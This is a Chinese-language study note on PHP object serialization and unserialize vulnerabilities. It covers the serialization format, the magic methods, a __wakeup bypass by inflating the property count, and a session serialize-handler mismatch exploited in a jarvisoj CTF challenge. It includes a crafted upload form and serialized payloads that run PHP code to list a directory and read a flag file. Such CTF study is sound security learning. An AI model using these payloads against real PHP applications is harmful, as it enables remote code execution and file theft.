基础
概述
序列化:把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等 函数 : serialize()
反序列化:恢复原先被序列化的变量 函数: unserialize()
serialize()函数用于序列化对象或数组,并返回一个字符串
- 据访问修饰符不同,序列化后的属性长度和属性值会有不同
- protected属性被序列化的时候属性值会变成%00*%00属性名
- private属性被序列化的时候属性值会变成%00类名%00属性名
反序列化一个对象后会保存对象的所有变量,反序列化后的结果都有一个字符:
a - array b - boolean
d - double i - integer
o - common object r - reference
s - string C - custom object
O - class N - null
R - pointer reference U - unicode string
序列化格式:
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}
对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}
魔术方法
__construct()//创建对象时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当脚本尝试将对象调用为函数时触发
-
__sleep()
对象被序列化之前触发,返回需要被序列化存储的成员属性,删除不必要的属性。
可以用于清理对象,并返回一个包含对象中所有应被序列化的变量名称的数组
如果该方法未返回任何内容,则 NULL 被序列化,并产生一个 E_NOTICE 级别的错误。
-
__wakeup
反序列化时触发
预先准备对象需要的资源,返回void,常用于反序列化操作中重新建立数据库连接或执行其他初始化操作。
反序列化漏洞
-
php在反序列化时,底层代码以“;”作为字段的分隔,根据长度判断内容
反序列化的过程必须严格按照序列化规则才能成功实验反序列化
-
序列化的长度不对应时会发生报错
-
可以反序列化类中不存在的元素
函数绕过
logo:
- Unserialize()函数的参数可控
- php中有可以利用的类并且类中有魔幻函数
例题
eg.
<meta http-equiv="Content-Type" content = "text/html; charset=utf-8" />
<?php
class SoFun{
protected $file = "index.php";
public function __construct($file){
$this->file = $file;
}
function __destruct()
{
if(!empty($this->file))
{
// 查找file文件中的字符串,若有“\\”和‘/’字符,就显示错误
if(strchr($this->file,"\\") === false && strchr($this->file,"/") === false)
{
show_source(dirname(__FILE__).'/'.$this->file);
}
else{
die("Wrong filename");
}
}
}
function __wakeup()
{
$this->file = 'index.php';
}
public function __toString()
{
return " ";
}
}
if(!isset($_GET['file']))
{
show_source('index.php');
}
else{
$file = base64_decode($_GET['file']);
echo unserialize($file);
}
// $test = new SoFun("flag.php");
// $s = serialize($test);
// $s[12]=2;
// echo $s;
// echo base64_encode($s);
// echo unserialize((serialize(($test))));
// 'O:5:"SoFun":2:{s:7:"*file";s:8:"flag.php";}'
?>
wakeup
在__wakeup()魔术方法中,在反序列化后会自动调用__wakeup方法并将file的值置为index.php
绕过方法:序列化后的字符串,属性个数比规定个数大
- wp:
- 放到本地
- 创建对象,并序列化,赋值给字符串
- str_replace函数更改属性个数:str_replace(‘1{’,‘2{’,$s)
- base64编码,上传
session反序列化漏洞
PHP在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取 $_SESSION 数据,都会对数据进行序列化和反序列化
-
php.ini配置:
session.save_path
设置session的存储路径session.save_handler
设定用户自定义存储函数session.auto_start
指定会话模块是否在请求开始时启动一个会话session.serialize_handler
定义用来序列化/反序列化的处理器名字。默认使用php除了默认的session序列化引擎php外,还有几种引擎,不同引擎存储方式不同 -
存储机制
php中的session内容是以文件方式来存储的,由
session.save_handler
来决定。文件名由sess_sessionid
命名,文件内容则为session序列化后的值。 -
session上传进度
当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态
当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时,上传进度可以在$_SESSION中获得。 当PHP检测到这种POST请求时,它会在$_SESSION中添加一组数据, 索引是 session.upload_progress.prefix 与 session.upload_progress.name连接在一起的值。
例题:
http://web.jarvisoj.com:32784/index.php
提到phpinfo,先查看phpinfo
php版本:5.6.21
php>5.5.4的版本默认使用php_serialize规则
默认为php_serialize而index.php中又使用了php,反序列化和序列化使用的处理器不同,由于格式的原因会导致数据无法正确反序列化,那么就可以通过构造伪造任意数据。
-
通过post构造数据传入$_SESSION
构造post提交表单:<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /> <input type="file" name="file" /> <input type="submit" /> </form>
-
构造序列化字符串
<?php class OowoO { public $mdzz='print_r(dirname(__FILE__));'; } $obj = new OowoO(); $a = serialize($obj); var_dump($a);
NT:需要转义,抓包把filename改为payload
最终提交为:|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:27:\"print_r(dirname(__FILE__));\";}
目录/opt/lampp/htdocs
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
继续读
然后用file_get_contents
函数读flag
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}